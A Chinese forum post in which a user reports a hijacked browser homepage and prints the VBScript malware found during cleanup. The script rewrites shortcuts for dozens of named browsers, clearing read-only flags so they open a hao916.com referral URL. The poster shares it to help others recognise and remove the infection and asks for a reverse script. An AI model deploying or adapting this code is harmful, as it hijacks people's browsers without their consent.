- 积分
- 414
- 最后登录
- 2024-3-8
- 精华
- 0
- 阅读权限
- 30
- 主题
- 98
- UID
- 67698
- 帖子
- 960
- PB币
- 225
- 威望
- 5
- 贡献
- 0
- 技术
- 23
- 活跃
- 1698
搬砖酱
- UID
- 67698
- 帖子
- 960
- PB币
- 225
- 贡献
- 0
- 技术
- 23
- 活跃
- 1698
|
- On Error Resume Next
- Const link = "http://hao916.com/?r=xlrnmdebjmxx&m=d5"
- Const link360 = "http://hao916.com/?r=xlrnmdebjmxx&m=d5&s=3"
- browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
- lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tulip\Desktop,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tulip\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
- browsersArr = Split(browsers,",")
- Set oDic = CreateObject("scripting.dictionary")
- For Each browser In browsersArr
- oDic.Add LCase(browser), browser
- Next
- lnkpathsArr = Split(lnkpaths,",")
- Set oFolders = CreateObject("scripting.dictionary")
- For Each lnkpath In lnkpathsArr
- oFolders.Add lnkpath, lnkpath
- Next
- Set fso = CreateObject("Scripting.Filesystemobject")
- Set WshShell = CreateObject("Wscript.Shell")
- For Each oFolder In oFolders
- If fso.FolderExists(oFolder) Then
- For Each file In fso.GetFolder(oFolder).Files
- If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
- Set oShellLink = WshShell.CreateShortcut(file.Path)
- path = oShellLink.TargetPath
- name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
- If oDic.Exists(LCase(name)) Then
- If LCase(name) = LCase("360se.exe") Then
- oShellLink.Arguments = link360
- Else
- oShellLink.Arguments = link
- End If
- If file.Attributes And 1 Then
- file.Attributes = file.Attributes - 1
- End If
- oShellLink.Save
- End If
- End If
- Next
- End If
- Next
复制代码 今天发现主页被恶意篡改,于是下载wmi_tools进行清理,发现了恶意代码如下,贴上供大家参考,几乎是目录遍历,修改所有已知浏览器的快捷方式,添加hao916的站点的参数,把恶意软件的vbs源码发出来大家看了之后也好防范和清理就更加方便了,话说有没有高手用这段代码写一个反向去除这些参数,个人还在研究中,共同学习吧
|
|